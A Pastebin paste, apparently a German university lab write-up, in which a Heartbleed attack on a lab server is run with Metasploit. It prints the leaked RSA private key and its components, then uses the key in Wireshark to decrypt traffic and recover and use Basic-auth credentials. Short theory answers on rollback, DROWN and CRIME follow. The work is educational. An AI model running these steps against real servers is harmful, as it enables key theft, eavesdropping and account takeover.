Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 2.)
- a.)
- (a) Führen Sie einen Heartbleedangriff mittels Metasploit auf den verwundbaren Server durch und beschaffen Sie sich den geheimen RSA-Schlüssel.
- In Metasploit:
- use auxiliary/scanner/ssl/openssl_heartbleed
- set RHOSTS 192.168.1.10
- set ACTION KEYS
- run
- In der neu erstellten Datei befindet sich der Key:
- -----BEGIN RSA PRIVATE KEY-----
- MIIEpQIBAAKCAQEAyUSgpv7pEzDTihKH2zBwrjVvPvF15ItyncUEVMX3L3OgODxH
- IdjRS6EFgLmcnkoxioP0xblFCnehfp3uOK/N6O0L7frZJAcEWbYi6n/Q457ga9Qm
- eHK18YSMgIZM63R2ORRsaIsPA0isTJJ06l8Oy/TcblUSW0Ka8Wv1XXSb38+GrwwS
- jsSG3KhcBGjNE38JBxrxTEPPWI/iR3YxrcOk4/b+wK4+vdgQiEh7lKmk7qJ429t1
- 0Tl879TKEiszzdTOJUM+LCTnriQQCUOo4B1gnT03IzO6HnJED/y4h8SxT87ydbP1
- q/em+X1i8iWjPyscm7kCln+l37aqGwo6AgLD1QIDAQABAoIBAQCrF4K10xYQ8T2y
- LsR8aLYw8U2LJTnBuWUKhvOCmPLizJjTlTImrKhmcRA7eA2SZaGtjTTja/Yryrxm
- 5Rwf5hrVOcUdXVN/E9P36yPNUjAhfupp32OAmoreL348t23l7g+dwCXTzPpLIVkO
- kqV+oqXybUmBJSJAn+MU/WAMPNdQrhh0U5YGPypM0NYFmXRSf0gpdyyXb2RL+jiA
- A2UwKaUdcFgl2jzUDaB+3VWk/JAaG2IdYBG6Ki0/v3QBJ3VbRrBM4up5Ky03G/77
- 6MxocWJt8pjG3Q7EammyIoXJ7eFkNZcgPmIvLECVxf8L1lSiMbmzvChvvFW5hRL1
- FVuWWtu1AoGBAOPrZ2cvxoEK+CLsQ1/t4wlSy0m6145OiqSgt5m/pJhp4IGT6Ey2
- SPgBxpnL/l35ZG7QD9dA64TvQWB5DJKq5vO6sTJWpemI1TRon35eqMS+TgdenE5F
- 6+Sx62nZPCZ2UEsKrLLrpUqnBjbMIiG+4fla9kF8INPnPWkYjdzr4IQzAoGBAOIQ
- onnWELofltXqVJdc2p9+DgRshPRFX6EzDsOWB1BExwlHpy2FgVEpszVfZLReriVb
- KpwV+R4Xe+Z5EiycA/i39ypQK2tMJSzJj+CEp5jfjyPjKxespSHEXRmYux6hBBO2
- ayS10wx44y6fFuGkk5RZ4g9rI+iJu0w4nEv5uE/XAoGBAIYjprDhOlf6R73uBV0x
- Gb0EAGb9Ux4K9agcetI/KzUUozBAB6kWY22rReKAX82ZGNXrGFecesC7O2P2+kJb
- 2R87EkzJGE6Q3MJCjRQHzBY21p+ZvC6JEmN/n0iltLQCUBFKUAfhjl+YW5zmmXP4
- 7vAd6+7wijWM0+TFscCDBplnAoGBAJSeVQJ+Hd8O123osRYVYFEMYRC9eybP2M+0
- Llec8U/u9179cUW3CE4geQV0olMGD7zVU4zr0SvcSoM5Qx56rw27e82giPrwQ1xP
- Yrw62afiCUuRlAnrYWBypLYoN5QqTPDcs1GeC5KegtRqmHNda/xSnxB94kyFB9JT
- QUWddXNfAoGACfFSvdjoERUaor0AYAVEsrVqRSu5dHEFTGOc00DIzoHYqwpWTvup
- PAR2xp8jsTtMXg9krVG4cqzbp/ZFECvmymFKP3WeRp8OXVEyg5WptVEVzjjDaouZ
- EfutQILVD0yPWS9ghN0j9UuUBdaGu18KGfjsfkIfVhuxSGxh4PacEPU=
- -----END RSA PRIVATE KEY-----
- openssl rsa -in rsa.txt -pubout > key.pub
- -----BEGIN PUBLIC KEY-----
- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyUSgpv7pEzDTihKH2zBw
- rjVvPvF15ItyncUEVMX3L3OgODxHIdjRS6EFgLmcnkoxioP0xblFCnehfp3uOK/N
- 6O0L7frZJAcEWbYi6n/Q457ga9QmeHK18YSMgIZM63R2ORRsaIsPA0isTJJ06l8O
- y/TcblUSW0Ka8Wv1XXSb38+GrwwSjsSG3KhcBGjNE38JBxrxTEPPWI/iR3YxrcOk
- 4/b+wK4+vdgQiEh7lKmk7qJ429t10Tl879TKEiszzdTOJUM+LCTnriQQCUOo4B1g
- nT03IzO6HnJED/y4h8SxT87ydbP1q/em+X1i8iWjPyscm7kCln+l37aqGwo6AgLD
- 1QIDAQAB
- -----END PUBLIC KEY-----
- (b) Zerlegen Sie den RSA-Schlüssel mittels openssl in seine Bestandteile und bestimmen Sie den Entschlüsselungsexponenten.
- In der Konsole:
- openssl rsa -text -in rsa.txt -out key.pub
- In key.pub:
- Private-Key: (2048 bit)
- modulus:
- 00:c9:44:a0:a6:fe:e9:13:30:d3:8a:12:87:db:30:
- 70:ae:35:6f:3e:f1:75:e4:8b:72:9d:c5:04:54:c5:
- f7:2f:73:a0:38:3c:47:21:d8:d1:4b:a1:05:80:b9:
- 9c:9e:4a:31:8a:83:f4:c5:b9:45:0a:77:a1:7e:9d:
- ee:38:af:cd:e8:ed:0b:ed:fa:d9:24:07:04:59:b6:
- 22:ea:7f:d0:e3:9e:e0:6b:d4:26:78:72:b5:f1:84:
- 8c:80:86:4c:eb:74:76:39:14:6c:68:8b:0f:03:48:
- ac:4c:92:74:ea:5f:0e:cb:f4:dc:6e:55:12:5b:42:
- 9a:f1:6b:f5:5d:74:9b:df:cf:86:af:0c:12:8e:c4:
- 86:dc:a8:5c:04:68:cd:13:7f:09:07:1a:f1:4c:43:
- cf:58:8f:e2:47:76:31:ad:c3:a4:e3:f6:fe:c0:ae:
- 3e:bd:d8:10:88:48:7b:94:a9:a4:ee:a2:78:db:db:
- 75:d1:39:7c:ef:d4:ca:12:2b:33:cd:d4:ce:25:43:
- 3e:2c:24:e7:ae:24:10:09:43:a8:e0:1d:60:9d:3d:
- 37:23:33:ba:1e:72:44:0f:fc:b8:87:c4:b1:4f:ce:
- f2:75:b3:f5:ab:f7:a6:f9:7d:62:f2:25:a3:3f:2b:
- 1c:9b:b9:02:96:7f:a5:df:b6:aa:1b:0a:3a:02:02:
- c3:d5
- publicExponent: 65537 (0x10001)
- privateExponent:
- 00:ab:17:82:b5:d3:16:10:f1:3d:b2:2e:c4:7c:68:
- b6:30:f1:4d:8b:25:39:c1:b9:65:0a:86:f3:82:98:
- f2:e2:cc:98:d3:95:32:26:ac:a8:66:71:10:3b:78:
- 0d:92:65:a1:ad:8d:34:e3:6b:f6:2b:ca:bc:66:e5:
- 1c:1f:e6:1a:d5:39:c5:1d:5d:53:7f:13:d3:f7:eb:
- 23:cd:52:30:21:7e:ea:69:df:63:80:9a:8a:de:2f:
- 7e:3c:b7:6d:e5:ee:0f:9d:c0:25:d3:cc:fa:4b:21:
- 59:0e:92:a5:7e:a2:a5:f2:6d:49:81:25:22:40:9f:
- e3:14:fd:60:0c:3c:d7:50:ae:18:74:53:96:06:3f:
- 2a:4c:d0:d6:05:99:74:52:7f:48:29:77:2c:97:6f:
- 64:4b:fa:38:80:03:65:30:29:a5:1d:70:58:25:da:
- 3c:d4:0d:a0:7e:dd:55:a4:fc:90:1a:1b:62:1d:60:
- 11:ba:2a:2d:3f:bf:74:01:27:75:5b:46:b0:4c:e2:
- ea:79:2b:2d:37:1b:fe:fb:e8:cc:68:71:62:6d:f2:
- 98:c6:dd:0e:c4:6a:69:b2:22:85:c9:ed:e1:64:35:
- 97:20:3e:62:2f:2c:40:95:c5:ff:0b:d6:54:a2:31:
- b9:b3:bc:28:6f:bc:55:b9:85:12:f5:15:5b:96:5a:
- db:b5
- prime1:
- 00:e3:eb:67:67:2f:c6:81:0a:f8:22:ec:43:5f:ed:
- e3:09:52:cb:49:ba:d7:8e:4e:8a:a4:a0:b7:99:bf:
- a4:98:69:e0:81:93:e8:4c:b6:48:f8:01:c6:99:cb:
- fe:5d:f9:64:6e:d0:0f:d7:40:eb:84:ef:41:60:79:
- 0c:92:aa:e6:f3:ba:b1:32:56:a5:e9:88:d5:34:68:
- 9f:7e:5e:a8:c4:be:4e:07:5e:9c:4e:45:eb:e4:b1:
- eb:69:d9:3c:26:76:50:4b:0a:ac:b2:eb:a5:4a:a7:
- 06:36:cc:22:21:be:e1:f9:5a:f6:41:7c:20:d3:e7:
- 3d:69:18:8d:dc:eb:e0:84:33
- prime2:
- 00:e2:10:a2:79:d6:10:ba:1f:96:d5:ea:54:97:5c:
- da:9f:7e:0e:04:6c:84:f4:45:5f:a1:33:0e:c3:96:
- 07:50:44:c7:09:47:a7:2d:85:81:51:29:b3:35:5f:
- 64:b4:5e:ae:25:5b:2a:9c:15:f9:1e:17:7b:e6:79:
- 12:2c:9c:03:f8:b7:f7:2a:50:2b:6b:4c:25:2c:c9:
- 8f:e0:84:a7:98:df:8f:23:e3:2b:17:ac:a5:21:c4:
- 5d:19:98:bb:1e:a1:04:13:b6:6b:24:b5:d3:0c:78:
- e3:2e:9f:16:e1:a4:93:94:59:e2:0f:6b:23:e8:89:
- bb:4c:38:9c:4b:f9:b8:4f:d7
- exponent1:
- 00:86:23:a6:b0:e1:3a:57:fa:47:bd:ee:05:5d:31:
- 19:bd:04:00:66:fd:53:1e:0a:f5:a8:1c:7a:d2:3f:
- 2b:35:14:a3:30:40:07:a9:16:63:6d:ab:45:e2:80:
- 5f:cd:99:18:d5:eb:18:57:9c:7a:c0:bb:3b:63:f6:
- fa:42:5b:d9:1f:3b:12:4c:c9:18:4e:90:dc:c2:42:
- 8d:14:07:cc:16:36:d6:9f:99:bc:2e:89:12:63:7f:
- 9f:48:a5:b4:b4:02:50:11:4a:50:07:e1:8e:5f:98:
- 5b:9c:e6:99:73:f8:ee:f0:1d:eb:ee:f0:8a:35:8c:
- d3:e4:c5:b1:c0:83:06:99:67
- exponent2:
- 00:94:9e:55:02:7e:1d:df:0e:d7:6d:e8:b1:16:15:
- 60:51:0c:61:10:bd:7b:26:cf:d8:cf:b4:2e:57:9c:
- f1:4f:ee:f7:5e:fd:71:45:b7:08:4e:20:79:05:74:
- a2:53:06:0f:bc:d5:53:8c:eb:d1:2b:dc:4a:83:39:
- 43:1e:7a:af:0d:bb:7b:cd:a0:88:fa:f0:43:5c:4f:
- 62:bc:3a:d9:a7:e2:09:4b:91:94:09:eb:61:60:72:
- a4:b6:28:37:94:2a:4c:f0:dc:b3:51:9e:0b:92:9e:
- 82:d4:6a:98:73:5d:6b:fc:52:9f:10:7d:e2:4c:85:
- 07:d2:53:41:45:9d:75:73:5f
- coefficient:
- 09:f1:52:bd:d8:e8:11:15:1a:a2:bd:00:60:05:44:
- b2:b5:6a:45:2b:b9:74:71:05:4c:63:9c:d3:40:c8:
- ce:81:d8:ab:0a:56:4e:fb:a9:3c:04:76:c6:9f:23:
- b1:3b:4c:5e:0f:64:ad:51:b8:72:ac:db:a7:f6:45:
- 10:2b:e6:ca:61:4a:3f:75:9e:46:9f:0e:5d:51:32:
- 83:95:a9:b5:51:15:ce:38:c3:6a:8b:99:11:fb:ad:
- 40:82:d5:0f:4c:8f:59:2f:60:84:dd:23:f5:4b:94:
- 05:d6:86:bb:5f:0a:19:f8:ec:7e:42:1f:56:1b:b1:
- 48:6c:61:e0:f6:9c:10:f5
- (c) Im Labornetzwerk verbindet sich ein Client via SSL in regelmäßigen Abständen mit diesem Server und es findet ein Datenaustausch statt. Versuchen Sie an den Inhalt dieser Daten zu gelangen.
- Den RSA Key in Wireshark einbinden:
- Bearbeiten -> Einstellungen -> Protocols -> SSL -> RSA keys list -> Edit
- IP address: 192.168.1.10, Port: 443, Protocol: tcp, Key File: rsa.txt, Password: <empty>
- SSL debug file -> ssldebug.txt neu erstellt
- Eine entschlüsselte Nachricht:
- GET /private/output.txt HTTP/1.1
- Authorization: Basic aXRzdXNlcjp4T3VXTVZrcWFJbFRIU1JmdnJvcA==
- User-Agent: curl/7.38.0
- Host: 192.168.1.10
- Accept: */*
- Base64 zu PlainText:
- aXRzdXNlcjp4T3VXTVZrcWFJbFRIU1JmdnJvcA==
- itsuser:xOuWMVkqaIlTHSRfvrop
- Damit auf der Seite einloggen: https://192.168.1.10/private/output.txt
- Inhalt der Seite: 3873dbad19d9b5edd -
- b.) Wie ändert sich die Situation, wenn TLS mit DHE-RSA-Schlüsselaustausch anstelle von SSL mit RSA-Schlüsselaustausch bei gleichbleibenden RSA-Schlüssel verwendet wird.
- The idea is that even if someone records traffic and compromises the server to get its private key, they won't be able to decipher that traffic, because they'll be missing the ephemeral DH parameters that won't have been saved. With fixed DH, the private DH parameters are effectively the private key: they would also be compromised in the same way and allow the attacker to decipher past traffic too.
- 3.)
- a.) Beschreiben Sie, wie man „Cipher Suite Rollback“ und „ChangeCipherSpec drop“verhindert.
- "The problem was fixed with the release of SSL 3.0 by authenticating all messages of the Handshake Protocol."
- "A hash value of all handshake messages sent and received by the client was included into the computations of the Client Finished message."
- "There are several countermeasures for defending against the Cipher Suite Rollback Attack:
- - Message Authentication to prevent the messages from being modified (Fernandez,E.B. 2013).
- - Sender Authentication that insures the non-repudiation of the messages. (Fernandez, E.B. 2013; Schumacher et al. 2006)
- - Message integrity that prevents the messages from any modification (Fernandez, E.B. 2013).
- - Confidentiality of traffic flow that prevents traffic analysis (Fernandez,E.B. 2013)."
- "The author’s recommendation is to force both parties to ensure that a ChangeCipherSpec message is received before accepting the Finished message. According to RFC 2246 TLS 1.0 enforces this recommendation."
- b.) Beschreiben Sie kurz und knapp die Grundidee von „Drown“ und wie man diesen Angriff verhindern kann.
- "The exploit includes a chosen-ciphertext attack with the use of a SSLv2 server as a Bleichenbacher oracle."
- "To protect against DROWN, server operators need to ensure that their private keys are not used anywhere with server software that allows SSLv2 connections."
- c.) Beschreiben Sie kurz und knapp die Grundidee von „Crime“ und wie man diesen Angriff verhindern kann. Gehen Sie insbesondere darauf ein, worauf es der Angreifer bei diesem Angriff abgesehen hat.
- "CRIME decrypts HTTPS cookies set by websites to remember authenticated users by means of brute force. The attack code forces the victim's browser to send specially crafted HTTPS requests to a targeted website and analyzes the variation in their length after they've been compressed in order to determine the value of the victim's session cookie."
- "This is possible because SSL/TLS and SPDY use a compression algorithm called DEFLATE, which eliminates duplicate strings."
- "CRIME can be defeated by preventing the use of compression, either at the client end, by the browser disabling the compression of SPDY requests, or by the website preventing the use of data compression on such transactions using the protocol negotiation features of the TLS protocol."
- "When used to recover the content of secret authentication cookies, it allows an attacker to perform session hijacking on an authenticated web session, allowing the launching of further attacks."
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement